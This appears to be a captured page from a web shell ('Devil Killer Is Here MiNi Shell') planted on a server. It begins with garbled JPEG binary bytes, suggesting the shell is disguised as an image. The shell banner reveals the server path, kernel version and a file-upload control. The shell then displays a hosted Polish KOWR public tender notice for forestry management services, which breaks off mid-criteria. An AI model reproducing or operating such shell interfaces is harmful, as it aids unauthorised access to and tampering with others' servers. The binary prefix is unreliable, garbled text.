JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240126/0007045701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi zarządzania zasobami leśnymi na nieruchomościach wchodzących w skład mienia Zasobu Własności Rolnej Skarbu Państwa na terenie działania KOWR OT we Wrocławiu WRO.WOP.260.2.2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mińska 60</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">54-610</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.wroclaw@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kowr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> wykonywanie prawa własności wobec nieruchomości Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi zarządzania zasobami leśnymi na nieruchomościach wchodzących w skład mienia Zasobu Własności Rolnej Skarbu Państwa na terenie działania KOWR OT we Wrocławiu WRO.WOP.260.2.2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1adf3292-bb65-11ee-b7da-22bd761ba7f3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00070457</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-01-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja odbywa się w formie elektronicznej, za pośrednictwem Platformy<br/>Zakupowej – pod adresem: https://kowr.eb2b.com.pl<br/>Zapytania kierowane na adresy mailowe nie będą rozpatrywane. Korzystanie z Platformy wymaga<br/>zarejestrowania konta na Platformie. Instrukcja korzystania z Platformy Zakupowej dostępna jest w<br/>zakładce „Pomoc/Instrukcje”. W zakładce „Załączniki” przedmiotowego postepowania Zamawiający<br/>zamieszcza dokumentację postępowania. Zakładka „Załączniki” służy również Wykonawcom do<br/>złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą. Korespondencja<br/>elektroniczna inna niż oferta Wykonawcy i załączniki do oferty, odbywa się elektronicznie za<br/>pośrednictwem Platformy w zakładce „Pytania/Informacje”. Zamawiający nie przewiduje sposobu<br/>komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej<br/>wskazanych w SWZ. Szczegółowe informacje zawarto w ust. 7 SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Przy rejestracji Wykonawca przechodzi<br/>do Formularza rejestracyjnego poprzez zakładkę „LOGOWANIE” oraz opcję„ ZAREJESTRUJ SIĘ”. Po wypełnieniu formularza<br/>rejestracyjnego Wykonawca otrzymuje e-maila<br/>informującego, że może dokonać pierwszego logowania do Platformy. 2. Minimalne<br/>wymagania techniczne i organizacyjne korzystania z Platformy określa Regulamin Platformy Zakupowej<br/>(dostępny pod adresem https://platforma.eb2b.com.pl/user/terms).3. Instrukcja korzystania z<br/>Platformy Zakupowej dostępna jest w zakładce „Pomoc/Instrukcje”.4. Wykonawca przystępując do<br/>postępowania o udzielenie zamówienia publicznego, akceptuje wa-runki korzystania z platformy,<br/>określone w instrukcji korzystania z platformy oraz w regulaminie platformy. Wykonawca korzystając z<br/>platformy zobowiązuje się do przestrzegania postanowień za-wartych w ww. instrukcji oraz w regulaminieplatformy.5. System<br/>umożliwia dodanie plików o wielkości do 50 MB. Zamawiający<br/>dopuszcza w szczególności pliki w formatach: .doc, .docx, .xls, .xlsx, .pdf, .jpg, .zip, .rar.6.<br/>Korespondencja elektroniczna inna niż oferta Wykonawcy i załączniki do oferty, odbywa się<br/>elektronicznie z apośrednictwem Platformy w zakładce „Pytania/Informacje”.7. Za datę wpływu oferty,<br/>oświadczenia, o którym mowa w art. 125 ust 1 ustawy PZP, podmiotowych środków dowodowych, w<br/>tym oświadczenia, o którym mowa w art. 117 ust. 4 ustawy PZP, zobowiązania podmiotu<br/>udostępniającego zasoby, przedmiotowych środków dowodowych, pełno-mocnictw, oraz innych<br/>informacji, dokumentów i oświadczeń przyjmuje się datę ich wczytywania do systemu (przesłania na<br/>Platformę).8 Plik oferty załączony przez Wykonawcę na Platformie i zapisany, widoczny jest w systemie<br/>jako zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu składania ofert.10. Zamawiający określa następujące niezbędne<br/>wymagania sprzętowo -aplikacyjne umożliwiają-ce pracę na Platformie: 1) stały dostęp do sieci Internet<br/>o gwarantowanej przepustowości nie mniejszej niż 2 mb/s; 2) komputer klasy PC lub PC lub MAC, o<br/>następującej konfiguracji: pamięć min. 4GB Ram, procesor Intel IV 4GHZ, jeden z systemów<br/>operacyjnych - MSWindows 7, Mac Os x 10.4, Linux lub ich nowsze wersje; 3) zainstalowana dowolna<br/>najnowsza wersja przeglądarki internetowej; w przypadku Internet Explorer minimalnie wersja 11.0; 4)<br/>włączona obsługa JavaScript; 5) zainstalowany program Acrobat Reader. 11. Sposób sporządzenia<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi<br/>być zgodny z wymaganiami określonymi w Rozporządzeniach, o których mowa w ust. 2 SWZ. 12.<br/>Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej wskazanej w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej jako „RODO”, wszystkie osoby, które ubiegają się o udzielenie zamówienia/ złożyły ofertę. Zamawiający informuje, że: 1. Administrator danych osobowych Administratorem, czyli podmiotem decydującym o celach i środkach przetwarzania Pani/Pana danych osobowych, jest Krajowy Ośrodek Wsparcia Rolnictwa (zwany dalej KOWR) z siedzibą w Warszawie (01-207) przy ul. Karolkowej 30. Z administratorem może się Pani/Pan skontaktować poprzez adres e-mail: kontakt@kowr.gov.pl lub pisemnie na adres korespondencyjny: Krajowy Ośrodek Wsparcia Rolnictwa, ul. Karolkowa 30, 01-207 Warszawa. 2. Inspektor Ochrony Danych Osobowych W KOWR wyznaczono Inspektora Ochrony Danych Osobowych, z którym może się Pani/Pan skontaktować w sprawach ochrony i przetwarzania swoich danych osobowych pod adresem e-mail: iodo@kowr.gov.pl lub pisemnie na adres naszej siedziby, wskazany w ust. 1.3. Cele i podstawy prawne przetwarzania danych osobowych Pani/Pana dane osobowe przetwarzane będą w celach związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym na podstawie ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych – Dz.U. z 2019 r. poz. 2019 z póżn. zm. (dalej PZP), w celach związanych z realizacją obowiązków administratora jako Zamawiającego, które wynikają z obowiązujących przepisów prawa. Pani/Pana dane osobowe przetwarzane będą także w celu realizacji obowiązku prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie z ustawą z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164 z późn. zm.).4. Odbiorcy danych osobowych Pani/Pana dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne. Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie z art. 18 ust 5 pkt 1 i 2 PZP. Pani/Pana dane osobowe mogą być udostępniane innym osobom lub podmiotom jeżeli obowiązek taki będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też mieć dostęp podmioty przetwarzające dane w naszym imieniu, np. podmioty świadczące pomoc prawną, usługi informatyczne, usługi niszczenia dokumentów, jak również inni administratorzy danych osobowych przetwarzający dane we własnym imieniu, np. podmioty prowadzące działalność pocztową lub kurierską.5. Okres przetwarzania danych osobowych Pani/Pana dane osobowe będą przetwarzane przez okres przewidziany przepisami prawa w tym zakresie, w tym przez okres przechowywania dokumentacji określony w przepisach powszechnych i uregulowaniach wewnętrznych KOWR w zakresie archiwizacji dokumentów, okres przedawnienia roszczeń przysługujących KOWR i w stosunku do niego. Dokumentacja dotycząca postępowania o udzielenie zamówienia publicznego będzie przechowywana, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, licząc od dnia 1 stycznia roku następnego po dniu zakończenia postępowania, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. ciąg dalszy w kolejnej w polu RODO (ograniczenia stosowania)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja o wymogu/dobrowolności podania danych osobowych Podanie Pani/Pana danych osobowych w związku z udziałem w postępowaniu o udzielenie zamówienia ma charakter dobrowolny, ale jest niezbędne do wzięcia w nim udziału. 7. Prawa osób, których dane dotyczą Zgodnie z RODO<br/>przysługuje Pani/Panu:1) prawo dostępu do swoich danych oraz otrzymania ich kopii; 2) prawo do sprostowania (poprawiania) swoich danych; 3) prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu<br/>prawa lub w ramach sprawowania władzy publicznej; 4) prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa. Jeżeli chce Pani/Pan skorzystać z któregokolwiek z tych uprawnień, prosimy o kontakt z Inspektorem Ochrony Danych Osobowych, wskazany w pkt 2 lub pisemnie na adres korespondencyjny, wskazany w pkt 1.Zgodnie z RODO, każdej osobie, której dane są przetwarzane przysługuje prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. 8. Zautomatyzowane podejmowanie decyzji W oparciu o Pani/Pana dane osobowe administrator nie będzie podejmował wobec Pani/Pana zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania. 9. Przekazywanie danych poza Europejski Obszar Gospodarczy W związku z jawnością postępowania o udzielenie zamówienia publicznego Pani/Pana dane mogą być przekazywane do państw trzecich (tj. państwa, które nie należy do Europejskiego Obszaru Gospodarczego obejmującego Unię Europejską, Norwegię, Liechtenstein i Islandię), z zastrzeżeniem, o którym mowa w punkcie 4</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRO.WOP.260.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 138880,49 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są: usługi zarządzania zasobami leśnymi na terenie działania KOWR OT we Wrocławiu, Sekcja Zamiejscowa w Świdnicy w zakresie nadzoru i prowadzenia spraw związanych z gospodarką leśną na gruntach będących lasami i usług związanych z drzewostanem na gruntach niebędących lasami, położonych w granicach nieruchomości wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa, w tym sporządzania pełnej dokumentacji dla prowadzonych spraw. Usługi dotyczą gruntów położonych na terenie powiatów: jaworskiego, ząbkowickiego, wał-brzyskiego, dzierżoniowskiego, świdnickiego, kłodzkiego i miasta Wałbrzych<br/>W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany będzie do:<br/>1)	w zakresie spraw związanych z gospodarką leśną:<br/>a)	prowadzenia spraw i nadzoru nad sprawami związanymi z gospodarką leśną na gruntach będących lasami i spraw dotyczących wycinki, korekty, pielęgnacji drzew i krzewów na gruntach niebędących lasami, zgodnie z ustawą z dnia 16 kwietnia 2004 r. o ochronie przyrody oraz ustawą z dnia 20 lipca 2017 r. – Prawo wodne, a także odpowiednimi przepisami wykonawczymi;<br/>b)	sporządzania pełnej dokumentacji dla spraw prowadzonych w zakresie gospodarki le-śnej i gospodarki drewnem, w tym rejestrowania tych spraw i prowadzenia ich w sys-temie komputerowym działającym w siedzibie Sekcji Zamiejscowej w Świdnicy, <br/>c)	udziału w kontrolach prowadzonych u kontrahentów Zamawiającego w sprawach doty-czących gospodarki leśnej i zadrzewień;<br/>d)	przeprowadzania zleconych przez Zamawiającego lustracji gruntów, o których mowa w pkt 1) lit. a);<br/>e)	współpracy z Wojewódzkim Konserwatorem Zabytków w sprawach związanych z pielę-gnacją, korektą i wycinką drzew na terenach wpisanych do rejestru zabytków.<br/>2)	w zakresie wyceny pozyskanego drewna do: <br/>a)	wyceny i klasyfikacji dokonanej na podstawie oględzin drzew rosnących na nierucho-mościach stanowiących Zasób Własności Rolnej Skarbu Państwa <br/>b)	szacunku brakarskiego i zakwalifikowania drewna jako użytkowe bądź opałowe dokona-ne na podstawie oględzin drzew według ustalonych wad drewna i jego przydatności;<br/>c)	pomiaru dokonywanego za pomocą średnicomierza, taśmy mierniczej – zalegalizowa-nej;<br/>d)	wyliczenia masy drewna dokonanego na podstawie „tablic miąższości kłód odziomko-wych i drzew stojących” oraz „tablic miąższości drewna okrągłego” jak też na podstawie własnych wzorów empirycznych;<br/>e)	wyceny drewna korzystając z zatwierdzonego dokumentu cennik netto, ceny detaliczne drewna (zł/m3) oraz własnej kalkulacji polegającej na określeniu ceny drewna z uwzględnieniem wad istotnych wykrytych w drewnie oraz biorąc pod uwagę specyfikę warunków w jakich rosną drzewa i wpływ tych warunków na jakość, przydatność drew-na.<br/>3)	w zakresie cechowania drewna do:<br/>a)	pozyskania drewna w oparciu m.in. o art. 14 a ust. 1 i 3 ustawy z dnia 28 września 1991 r. o lasach oraz rozporządzenie Ministra Ochrony Środowiska, Zasobów Naturalnych i Leśnictwa z dnia 24 lutego 1998 r. w sprawie szczegółowych zasad cechowania drewna, wzorów urządzeń do cechowania i zasad ich stosowania oraz wzoru dokumentu stwier-dzającego legalność pozyskania drewna.<br/>b)	cechowania drewna według systemu płytkowego. Płytki nabijane będą na kłodzie ścię-tego drzewa za pomocą specjalnego młotka. Płytki będą wykorzystywane jednorazowo i każda z nich będzie miała odrębny numer. <br/>c)	sporządzania dokumentów dot. legalności pozyskania drewna.<br/>d)	sporządzania wykazu odbiorczego drewna.<br/>4)	w zakresie interwencji w sprawie kradzieży drewna do:<br/>a)	spisania notatki na miejscu zdarzenia w tym określenia wartości, zabezpieczenia<br/>i opisania skradzionego drewna - zrobienia dokumentacji fotograficznej;<br/>b)	zgłoszenia na policję zaistniałego zdarzenia oraz udziału w postępowaniu wyjaśniają-cym.<br/>5)	w zakresie nadzoru nad pracami wykonawczymi w terenie do: przygotowania zleceń na prace związane z gospodarką leśną w terenie, sprawowania pełnego nadzoru nad tymi pracami oraz przyjęciu ich i rozliczeniu.<br/>6)	w zakresie sprawozdawczości do: sporządzania sprawozdań z czynności wykonywanych w ramach realizacji przedmiotu zamówienia, w szczególności rozliczeń finansowych, jako-ściowych i ilościowych dla prowadzonych spraw.<br/>Warunki oraz terminy realizacji przedmiotu zamówienia: <br/>1)	zamawiający wymaga aby usługi objęte zamówieniem świadczyła maksymalnie jedna osoba.<br/>2)	usługi objęte niniejszym zamówieniem świadczone będą - w terenie lub siedzibie Sekcji Zamiejscowej w Świdnicy przy ul. Kliczkowskiej 28.<br/>3)	wykonawca zobowiązany będzie świadczyć usługi (w tym prace terenowe) w wymiarze <br/>90 godzin miesięcznie. <br/>4)	zamawiający zapewni Wykonawcy nieodpłatną obsługę organizacyjno-techniczną, w siedzibie Sekcji Zamiejscowej w Świdnicy, w tym: <br/>a)	wyposażone stanowisko pracy biurowej, z dostępem do podstawowych urządzeń technicznych, w tym: komputera, kopiarki, umożliwiających wykonywanie czynności objętych zamówieniem,<br/>b)	udostępnianie niezbędnych dla danej sprawy dokumentów źródłowych,<br/>c)	telefon służbowy do użytku związanego z realizacją przedmiotu zamówienia.<br/>5)	Wykonawca zobowiązany jest do prawidłowej eksploatacji udostępnionego mienia dla celów należytego wykonania przedmiotu Umowy.<br/>6)	zamawiający informuje, że w ramach zapewnienia nieodpłatnej obsługi organizacyjno-technicznej nie przewiduje udostępnienia do wykonywania usług środków transportu. Wykonawca będzie realizował czynności przy użyciu własnych środków transportu wykonując miesięcznie: około 1500 km.<br/>7)	przed wystawieniem faktury za wykonane usługi, wykonawca zobowiązany będzie do sporządzania wykazów z wykonanych usług w szczególności rozliczeń finansowych, jakościowych i ilościowych dla spraw prowadzonych wraz z rozliczeniem godzinowym.<br/>8)	pozostałe warunki realizacji zamówienia zawarte są w projektowanych postanowieniach umowy, które zostaną wprowadzone do treści umowy stanowiących załącznik 6 do SWZ. Złożenie oferty jest jednoznaczne z akceptacją projektowanych postanowień umowy, które zostaną wprowadzone do treści umowy.<br/>Zamawiający nie dopuszcza składania ofert wariantowych.<br/>Wykonawca może złożyć tylko jedną ofertę. Oferta nie zawierająca pełnego zakresu przedmiotu zamówienia zostanie odrzucona.<br/>Zamówienie nie zostało podzielone na części. Czynności wskazane w opisie przedmiotu zamówienia składają się na cały proces prowadzenia i nadzoru spraw związanych z gospodarką leśną na obszarze terytorialnym podległym Sekcji Zamiejscowej w Świdnicy. Podział zamówienia na części poprzez rozdzielenie procesu jest niecelowy. Z przyczyn organizacyjnych oraz ekonomicznych zasadnym jest udzielenie zamówienia bez jego podziału na części.<br/>Na podstawie art. 95 ustawy PZP, Zamawiający wymaga, a Wykonawca zobowiązuje się do realizacji przedmiotu umowy samodzielnie lub przez osobę zatrudnioną przez niego na podstawie umowy o pracę w rozumieniu przepisów Ustawy z dnia 26 czerwca 1974 r. Kodeks pracy, w zakresie realizacji czynności wymienionych w ust. 3.4 pkt 1-5 SWZ. W przypadku osób prowadzących działalność gospodarczą, niezatrudniających pracowników, Zamawiający zastrzega, że czynności w zakresie realizacji przedmiotu zamówienia określone w ust. 3.4 pkt 1-5 SWZ wykonają osobiście osoby prowadzące tą działalność gospodarczą. Pozostałe informacje zawarto w projektowanych postanowieniach umowy, które zostaną wprowadzone do treści umowy stanowiących załącznik nr 6 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77231100-9 - Usługi zarządzania zasobami leśnymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1	Kryterium „Cena brutto za przedmiot zamówienia” (Kc)	60%<br/>2	Kryterium „Kwalifikacje i doświadczenie osoby wyznaczonej do realizacji zamówienia” 